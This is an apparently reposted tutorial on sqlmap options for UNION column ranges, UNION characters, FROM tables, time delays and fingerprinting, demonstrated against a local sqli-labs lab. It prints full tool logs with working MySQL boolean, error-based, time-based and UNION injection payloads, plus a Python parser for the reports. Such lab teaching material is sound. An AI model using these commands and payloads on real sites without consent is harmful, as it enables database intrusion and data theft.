[11:06:58] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[11:07:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:07:06] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:07:06] [INFO] testing 'Generic inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:07:06] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[11:07:06] [INFO] testing 'MySQL inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:07:06] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:07:13] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:07:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:07:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:07:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:07:13] [INFO] target URL appears to have 3 columns in query
[11:07:13] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1324=1324 AND ('QGoK'='QGoK

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1') AND (SELECT 4928 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(4928=4928,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('LiLq'='LiLq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2335') UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6f74417665587859716869647543466d4c486e59584d504148467673707957736957435651565950,0x716a6a7071)-- -
---
[11:07:45] [INFO] the back-end DBMS is MySQL
[11:07:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[11:07:45] [INFO] fetching current database
current database: 'security'
[11:07:45] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 11:07:45 /2020-03-01/


The output contains this section:

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn

SELECT(SLEEP(3)) makes the SELECT statement pause for 3 seconds, which is the delay set by --time-sec 3 instead of the default 5.
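An added example (not code from the post or from sqlmap) that parses the injection-point report above into records, maps each `Type` to its `--technique` letter from section 1, reads the requested delay out of the `SLEEP(n)` payload so you can confirm `--time-sec` took effect, and counts the UNION columns from the payload. The embedded report is copied from the `--time-sec 3` run above; the `parse_report` and `summarize` helper names and the Type-to-letter table are assumptions made for this example.

```python
import re

# Constructed copy of the injection-point report sqlmap printed in the
# --time-sec 3 run above, embedded so the example runs offline.
REPORT = """\
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1324=1324 AND ('QGoK'='QGoK

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1') AND (SELECT 4928 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(4928=4928,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('LiLq'='LiLq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2335') UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6f74417665587859716869647543466d4c486e59584d504148467673707957736957435651565950,0x716a6a7071)-- -
---
"""

# Report Type string -> --technique letter from section 1 (assumed table).
TYPE_TO_LETTER = {
    "boolean-based blind": "B",
    "error-based": "E",
    "UNION query": "U",
    "stacked queries": "S",
    "time-based blind": "T",
    "inline query": "Q",
}

PARAM_RE = re.compile(r"^Parameter: (?P<name>\S+) \((?P<place>\w+)\)")
FIELD_RE = re.compile(r"^\s+(?P<key>Type|Title|Payload): (?P<value>.*)$")
SLEEP_RE = re.compile(r"\bSLEEP\((\d+)\)", re.I)
UNION_RE = re.compile(r"UNION\s+ALL\s+SELECT\s+(.+?)(?:--|#|$)", re.I)


def parse_report(text):
    """Turn the report into one dict per injection point
    (parameter, place, type, title, payload)."""
    points, current, name, place = [], None, None, None
    for line in text.splitlines():
        pm = PARAM_RE.match(line)
        if pm:
            name, place = pm.group("name"), pm.group("place")
            continue
        fm = FIELD_RE.match(line)
        if not fm:
            continue
        key, value = fm.group("key").lower(), fm.group("value")
        if key == "type":                      # a Type line opens a new point
            current = {"parameter": name, "place": place, "type": value}
            points.append(current)
        else:                                  # Title / Payload belong to it
            current[key] = value
    return points


def technique_letter(type_name):
    """Map a report Type to its --technique letter ('?' for an unknown type)."""
    for key, letter in TYPE_TO_LETTER.items():
        if key in type_name:
            return letter
    return "?"


def sleep_seconds(payload):
    """The n in SLEEP(n) of a time-based payload; None if the payload has none."""
    m = SLEEP_RE.search(payload)
    return int(m.group(1)) if m else None


def union_column_count(payload):
    """Top-level expressions in a UNION ALL SELECT list; None if not a UNION payload."""
    m = UNION_RE.search(payload)
    if not m:
        return None
    depth, cols = 0, 1
    for ch in m.group(1):                      # count commas outside parentheses
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            cols += 1
    return cols


def summarize(text):
    """One row per injection point with the derived letter, delay and column count."""
    return [{
        "parameter": p["parameter"],
        "technique": technique_letter(p["type"]),
        "title": p["title"],
        "sleep_seconds": sleep_seconds(p["payload"]),
        "union_columns": union_column_count(p["payload"]),
    } for p in parse_report(text)]


def techniques_used(text):
    """Letters of all confirmed techniques in sqlmap's BEUSTQ order, e.g. 'BEUT'."""
    letters = {row["technique"] for row in summarize(text)}
    return "".join(l for l in "BEUSTQ" if l in letters)


if __name__ == "__main__":
    for row in summarize(REPORT):
        print(row)
    print("techniques:", techniques_used(REPORT))
```

For the report above the time-based row carries `sleep_seconds` 3 and the UNION row `union_columns` 3, matching the "3 columns" sqlmap announced; the same parser works on the `--dbms-cred` and `-f` reports earlier in the post, where the SLEEP value is the default 5.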

3. sqlmap: setting the UNION column count

For UNION query injection sqlmap detects the number of columns automatically, by default in the range 1 to 10;
at higher --level values the upper bound of that range grows to 50.
Option:
--union-cols
This option overrides the column detection range; for example --union-cols 12-16 makes sqlmap test 12 to 16 columns.
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18

Output:

(screenshot: union-cols)

4. sqlmap: setting the UNION character

Option:
--union-char
By default sqlmap fills the columns of a UNION query with NULL.
At higher --level values sqlmap instead generates random numbers for the UNION columns, because a NULL-based UNION sometimes fails where a random number succeeds; this option lets you choose that value yourself.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123

Output:

(screenshot: union-char)

5. sqlmap: setting the UNION FROM table

Option:
--union-from
In some cases the UNION query must name a valid, accessible table in its FROM clause, otherwise the UNION query fails.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123 --union-from users

Output:

(screenshot: union-from)

6. sqlmap fingerprinting

Probing the target's fingerprint:
Option:
-f or --fingerprint
Its usage and effect are similar to --banner.
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 -f

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:31:12 /2020-03-01/

[12:31:13] [INFO] testing connection to the target URL
[12:31:13] [INFO] testing if the target URL content is stable
[12:31:13] [INFO] target URL content is stable
[12:31:13] [INFO] testing if GET parameter 'id' is dynamic
[12:31:13] [INFO] GET parameter 'id' appears to be dynamic
[12:31:13] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:31:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:31:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[12:31:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:31:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[12:31:40] [INFO] testing 'Generic inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:31:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:31:40] [INFO] testing 'MySQL inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:31:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:31:51] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:31:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:31:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:31:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:31:51] [INFO] target URL appears to have 3 columns in query
[12:31:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1945=1945 AND ('oLHz'='oLHz

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1') AND (SELECT 6730 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(6730=6730,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('IlMq'='IlMq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 1477 FROM (SELECT(SLEEP(5)))GkLS) AND ('Wwjt'='Wwjt

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-4873') UNION ALL SELECT NULL,CONCAT(0x716a6a7171,0x45744c655268474b765270526d476a6a574a6d53776b4c637753784d664c6544774d766e664a5950,0x716a786a71),NULL-- -
---
[12:31:54] [INFO] testing MySQL
[12:31:54] [INFO] confirming MySQL
[12:31:54] [INFO] the back-end DBMS is MySQL
[12:31:54] [INFO] actively fingerprinting MySQL
[12:31:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:31:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
               html error message fingerprint: MySQL
[12:31:55] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 12:31:55 /2020-03-01/


The output now includes an active fingerprint, i.e. basic information about the database.

Reposted from blog.csdn.net/CUFEECR/article/details/104590619